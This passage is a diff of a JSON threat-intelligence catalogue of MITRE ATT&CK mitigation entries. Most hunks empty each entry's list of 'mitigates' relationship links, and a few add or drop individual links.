- "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "f2dcee22-c275-405e-87fd-48630a19dfba",
"value": "Exploitation for Client Execution Mitigation - T1203"
},
@@ -1742,22 +1339,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "68c96494-1a50-403e-8844-69a6af278c68",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "98034fef-d9fb-4667-8dc4-2eab6231724c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d7c49196-b40e-42bc-8eed-b803113692ed",
"value": "Change Default File Association Mitigation - T1042"
},
@@ -1774,15 +1356,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "39706d54-0d06-4a25-816a-78cc43455100",
"value": "Data from Removable Media Mitigation - T1025"
},
@@ -1796,15 +1370,7 @@
"https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx"
]
},
- "related": [
- {
- "dest-uuid": "e6415f09-df0e-48de-9aba-928c902b7549",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "e547ed6a-f1ca-40df-8613-2ce27927f145",
"value": "Exfiltration Over Physical Medium Mitigation - T1052"
},
@@ -1818,15 +1384,7 @@
"https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx"
]
},
- "related": [
- {
- "dest-uuid": "64196062-5210-42c3-9a02-563a0d1797ef",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "b8d57b16-d8e2-428c-a645-1083795b3445",
"value": "Communication Through Removable Media Mitigation - T1092"
},
@@ -1843,15 +1401,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "2ace01f8-67c8-43eb-b7b1-a7b9f1fe67e1",
"value": "File and Directory Discovery Mitigation - T1083"
},
@@ -1869,15 +1419,7 @@
"https://github.com/mattifestation/PowerSploit"
]
},
- "related": [
- {
- "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "96913243-2b5e-4483-a65c-bb152ddd2f04",
"value": "DLL Search Order Hijacking Mitigation - T1038"
},
@@ -1894,15 +1436,7 @@
"https://github.com/mattifestation/PowerSploit"
]
},
- "related": [
- {
- "dest-uuid": "0ca7beef-9bbc-4e35-97cf-437384ddce6a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1022138b-497c-40e6-b53a-13351cbd4090",
"value": "File System Permissions Weakness Mitigation - T1044"
},
@@ -1919,15 +1453,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c1676218-c16a-41c9-8f7a-023779916e39",
"value": "System Network Connections Discovery Mitigation - T1049"
},
@@ -1942,15 +1468,7 @@
"https://attack.mitre.org/mitigations/T1058"
]
},
- "related": [
- {
- "dest-uuid": "39a130e1-6ab7-434a-8bd2-418e7d9d6427",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "9378f139-10ef-4e4b-b679-2255a0818902",
"value": "Service Registry Permissions Weakness Mitigation - T1058"
},
@@ -1967,15 +1485,7 @@
"https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm"
]
},
- "related": [
- {
- "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "4b998a71-7b8f-4dcc-8f3f-277f2e740271",
"value": "Indicator Removal from Tools Mitigation - T1066"
},
@@ -1990,15 +1500,7 @@
"https://en.wikipedia.org/wiki/Control-flow_integrity"
]
},
- "related": [
- {
- "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "92e6d080-ca3f-4f95-bc45-172a32c4e502",
"value": "Exploitation for Privilege Escalation Mitigation - T1068"
},
@@ -2011,15 +1513,7 @@
"https://github.com/hfiref0x/UACME"
]
},
- "related": [
- {
- "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "beb45abb-11e8-4aef-9778-1f9ac249784f",
"value": "Bypass User Account Control Mitigation - T1088"
},
@@ -2034,15 +1528,7 @@
"https://en.wikipedia.org/wiki/Control-flow_integrity"
]
},
- "related": [
- {
- "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "37a3f3f5-76e6-43fe-b935-f1f494c95725",
"value": "Exploitation for Defense Evasion Mitigation - T1211"
},
@@ -2059,15 +1545,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "52f3d5a6-8a0f-4f82-977e-750abf90d0b0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "cba5667e-e3c6-44a4-811c-266dbc00e440",
"value": "Extra Window Memory Injection Mitigation - T1181"
},
@@ -2082,15 +1560,7 @@
"https://en.wikipedia.org/wiki/Control-flow_integrity"
]
},
- "related": [
- {
- "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "06160d81-62be-46e5-aa37-4b9c645ffa31",
"value": "Exploitation for Credential Access Mitigation - T1212"
},
@@ -2107,15 +1577,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ff5d862a-ae6b-4833-8c15-e235d654d28e",
"value": "Component Object Model Hijacking Mitigation - T1122"
},
@@ -2127,15 +1589,7 @@
"https://attack.mitre.org/mitigations/T1213"
]
},
- "related": [
- {
- "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "13cad982-35e3-4340-9095-7124b653df4b",
"value": "Data from Information Repositories Mitigation - T1213"
},
@@ -2150,15 +1604,7 @@
"https://patchwork.kernel.org/patch/8754821/"
]
},
- "related": [
- {
- "dest-uuid": "6be14413-578e-46c1-8304-310762b3ecd5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "44155d14-ca75-4fdf-b033-ab3d732e2884",
"value": "Kernel Modules and Extensions Mitigation - T1215"
},
@@ -2175,22 +1621,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "a750a9f6-0bde-4bb3-9aae-1e2786e9780c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "e7eab98d-ae11-4491-bd28-a53ba875865a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "94e95eeb-7cdb-4bd7-afba-f32fda303dbb",
"value": "Network Share Connection Removal Mitigation - T1126"
},
@@ -2202,15 +1633,7 @@
"https://attack.mitre.org/mitigations/T1216"
]
},
- "related": [
- {
- "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "51048ba0-a5aa-41e7-bf5d-993cd217dfb2",
"value": "Signed Script Proxy Execution Mitigation - T1216"
},
@@ -2222,15 +1645,7 @@
"https://attack.mitre.org/mitigations/T1129"
]
},
- "related": [
- {
- "dest-uuid": "0a5231ec-41af-4a35-83d0-6bdf11f28c65",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "cfd2cd3b-93e7-4b3e-ab46-f8bcafdbdfcf",
"value": "Execution through Module Load Mitigation - T1129"
},
@@ -2247,15 +1662,7 @@
"https://technet.microsoft.com/library/cc771387.aspx"
]
},
- "related": [
- {
- "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "910482b1-6749-4934-abcb-3e34d58294fc",
"value": "Distributed Component Object Model Mitigation - T1175"
},
@@ -2267,15 +1674,7 @@
"https://attack.mitre.org/mitigations/T1185"
]
},
- "related": [
- {
- "dest-uuid": "544b0346-29ad-41e1-a808-501bb4193f47",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "94f6b4f5-b528-4f50-91d5-f66457c2f8f7",
"value": "Man in the Browser Mitigation - T1185"
},
@@ -2287,15 +1686,7 @@
"https://attack.mitre.org/mitigations/T1158"
]
},
- "related": [
- {
- "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "84d633a4-dd93-40ca-8510-40238c021931",
"value": "Hidden Files and Directories Mitigation - T1158"
},
@@ -2313,15 +1704,7 @@
"https://www.ready.gov/business/implementation/IT"
]
},
- "related": [
- {
- "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "429a5c0c-e132-45c0-a4aa-c1f736c92a1c",
"value": "Data Encrypted for Impact Mitigation - T1486"
},
@@ -2334,15 +1717,7 @@
"https://attack.mitre.org/mitigations/T1498"
]
},
- "related": [
- {
- "dest-uuid": "d74c4a7e-ffbf-432f-9365-7ebf1f787cab",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "654addf1-47ab-410a-8578-e1a0dc2a49b8",
"value": "Network Denial of Service Mitigation - T1498"
},
@@ -2355,43 +1730,7 @@
"https://attack.mitre.org/mitigations/T1499"
]
},
- "related": [
- {
- "dest-uuid": "0df05477-c572-4ed6-88a9-47c581f548f7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "18cffc21-3260-437e-80e4-4ab8bf2ba5e9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "38eb0c22-6caf-46ce-8869-5964bd735858",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c675646d-e204-4aa8-978d-e3d6d65885c4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "82c21600-ccb6-4232-8c04-ef3792b56628",
"value": "Endpoint Denial of Service Mitigation - T1499"
},
@@ -2403,15 +1742,7 @@
"https://attack.mitre.org/mitigations/T1190"
]
},
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "65da1eb6-d35d-4853-b280-98a76c0aef53",
"value": "Exploit Public-Facing Application Mitigation - T1190"
},
@@ -2428,15 +1759,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "dd43c543-bb85-4a6f-aa6e-160d90d06a49",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "e8d22ec6-2236-48de-954b-974d17492782",
"value": "Two-Factor Authentication Interception Mitigation - T1111"
},
@@ -2448,15 +1771,7 @@
"https://attack.mitre.org/mitigations/T1156"
]
},
- "related": [
- {
- "dest-uuid": "01df3350-ce05-4bdf-bdf8-0a919a66d4a8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "4f170666-7edb-4489-85c2-9affa28a72e0",
"value": ".bash_profile and .bashrc Mitigation - T1156"
},
@@ -2473,15 +1788,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "16f144e4-c780-4ed2-98b4-55d14e2dfa44",
"value": "System Owner/User Discovery Mitigation - T1033"
},
@@ -2498,15 +1805,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "25d5e1d8-c6fb-4735-bc57-115a21222f4b",
"value": "Application Window Discovery Mitigation - T1010"
},
@@ -2568,6 +1867,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "208884f1-7b83-4473-ac22-4e1cf6c41471",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "232a7e42-cd6e-4902-8fe9-2960f529dd4d",
"tags": [
@@ -2631,6 +1937,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
"tags": [
@@ -2771,6 +2084,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"tags": [
@@ -2806,13 +2126,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
"tags": [
@@ -2842,15 +2155,7 @@
"https://attack.mitre.org/mitigations/T1004"
]
},
- "related": [
- {
- "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "313c8b20-4d49-40c1-9ac0-4c573aca28f3",
"value": "Winlogon Helper DLL Mitigation - T1004"
},
@@ -2867,15 +2172,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "cf7b3a06-8b42-4c33-bbe9-012120027925",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ae56a49d-5281-45c5-ab95-70a1439c338e",
"value": "Compile After Delivery Mitigation - T1500"
},
@@ -2923,13 +2220,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2204c371-6100-4ae0-82f3-25c07c29772a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "233fe2c0-cb41-4765-b454-e0087597fbce",
"tags": [
@@ -3136,15 +2426,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d8787791-d22e-45bb-a9a8-251d8d0a1ff2",
"value": "System Service Discovery Mitigation - T1007"
},
@@ -3161,15 +2443,7 @@
"https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm"
]
},
- "related": [
- {
- "dest-uuid": "246fd3c7-f5e3-466d-8787-4c13d9e3b61c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "f0a42cad-9b1f-44da-a672-718f18381018",
"value": "Taint Shared Content Mitigation - T1080"
},
@@ -3183,15 +2457,7 @@
"https://technet.microsoft.com/en-us/library/dn408187.aspx"
]
},
- "related": [
- {
- "dest-uuid": "6c174520-beea-43d9-aac6-28fb77f3e446",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "9e57c770-5a39-49a2-bb91-253ba629e3ac",
"value": "Security Support Provider Mitigation - T1101"
},
@@ -3208,15 +2474,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1881da33-fdf2-4eea-afd0-e04caf9c000f",
"value": "Peripheral Device Discovery Mitigation - T1120"
},
@@ -3229,15 +2487,7 @@
"https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/password-must-meet-complexity-requirements"
]
},
- "related": [
- {
- "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "49961e75-b493-423a-9ec7-ac2d6f55384a",
"value": "Password Policy Discovery Mitigation - T1201"
},
@@ -3251,15 +2501,7 @@
"https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec"
]
},
- "related": [
- {
- "dest-uuid": "d519cfd5-f3a8-43a9-a846-ed0bb40672b1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "23061b40-a7b6-454f-8950-95d5ff80331c",
"value": "Install Root Certificate Mitigation - T1130"
},
@@ -3275,15 +2517,7 @@
"https://github.com/mattifestation/PowerSploit"
]
},
- "related": [
- {
- "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "fe0aeb41-1a51-4152-8467-628256ea6adf",
"value": "Modify Existing Service Mitigation - T1031"
},
@@ -3296,15 +2530,7 @@
"https://attack.mitre.org/mitigations/T1105"
]
},
- "related": [
- {
- "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "cdecc44a-1dbf-4c1f-881c-f21e3f47272a",
"value": "Remote File Copy Mitigation - T1105"
},
@@ -3321,15 +2547,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "a6525aec-acc4-47fe-92f9-b9b4de4b9228",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "aaa92b37-f96c-4a0a-859c-b1cb6faeb13d",
"value": "Graphical User Interface Mitigation - T1061"
},
@@ -3341,15 +2559,7 @@
"https://attack.mitre.org/mitigations/T1017"
]
},
- "related": [
- {
- "dest-uuid": "327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c88151a5-fe3f-4773-8147-d801587065a4",
"value": "Application Deployment Software Mitigation - T1017"
},
@@ -3362,22 +2572,7 @@
"https://attack.mitre.org/mitigations/T1081"
]
},
- "related": [
- {
- "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "0472af99-f25c-4abe-9fce-010fa3450e72",
"value": "Credentials in Files Mitigation - T1081"
},
@@ -3394,15 +2589,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "9a902722-cecd-4fbe-a6c9-49333aa0f8c2",
"value": "Remote System Discovery Mitigation - T1018"
},
@@ -3420,15 +2607,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1e614ba5-2fc5-4464-b512-2ceafb14d76d",
"value": "Indirect Command Execution Mitigation - T1202"
},
@@ -3440,15 +2619,7 @@
"https://attack.mitre.org/mitigations/T1220"
]
},
- "related": [
- {
- "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "7708ac15-4beb-4863-a1a5-da2d63fb8a3c",
"value": "XSL Script Processing Mitigation - T1220"
},
@@ -3461,15 +2632,7 @@
"https://attack.mitre.org/mitigations/T1032"
]
},
- "related": [
- {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "a766ce73-5583-48f3-b7c0-0bb43c6ef8c7",
"value": "Standard Cryptographic Protocol Mitigation - T1032"
},
@@ -3482,15 +2645,7 @@
"https://attack.mitre.org/mitigations/T1024"
]
},
- "related": [
- {
- "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "a569295c-a093-4db4-9fb4-7105edef85ad",
"value": "Custom Cryptographic Protocol Mitigation - T1024"
},
@@ -3507,15 +2662,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c620e3a1-fff5-424f-abea-d2b0f3616f67",
"value": "System Information Discovery Mitigation - T1082"
},
@@ -3528,15 +2675,7 @@
"https://attack.mitre.org/mitigations/T1028"
]
},
- "related": [
- {
- "dest-uuid": "c3bce4f4-9795-46c6-976e-8676300bbc39",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "3e9f8875-d2f7-4380-a578-84393bd3b025",
"value": "Windows Remote Management Mitigation - T1028"
},
@@ -3566,15 +2705,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "bd2554b8-634f-4434-a986-9b49c29da2ae",
"value": "Security Software Discovery Mitigation - T1063"
},
@@ -3591,15 +2722,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d256cb63-b021-4b4a-bb6d-1b42eea179a3",
"value": "Network Service Scanning Mitigation - T1046"
},
@@ -3647,20 +2770,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36",
"tags": [
@@ -3703,13 +2812,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b",
"tags": [
@@ -3735,15 +2837,7 @@
"https://www.ready.gov/business/implementation/IT"
]
},
- "related": [
- {
- "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "bb25b897-bfc7-4128-839d-52e9764dbfa6",
"value": "Inhibit System Recovery Mitigation - T1490"
},
@@ -3756,15 +2850,7 @@
"https://attack.mitre.org/mitigations/T1065"
]
},
- "related": [
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "a0d8db1d-a731-4428-8209-c07175f4b1fe",
"value": "Uncommonly Used Port Mitigation - T1065"
},
@@ -3777,15 +2863,7 @@
"https://github.com/iadgov/Secure-Host-Baseline/blob/master/Windows/Group%20Policy%20Templates/en-US/SecGuide.adml"
]
},
- "related": [
- {
- "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "bcee7b05-89a6-41a5-b7aa-fce4da7ede9e",
"value": "Pass the Hash Mitigation - T1075"
},
@@ -3799,15 +2877,7 @@
"https://technet.microsoft.com/en-us/library/cc754272(v=ws.11).aspx"
]
},
- "related": [
- {
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "53b3b027-bed3-480c-9101-1247047d0fe6",
"value": "Remote Desktop Protocol Mitigation - T1076"
},
@@ -3827,15 +2897,7 @@
"https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore"
]
},
- "related": [
- {
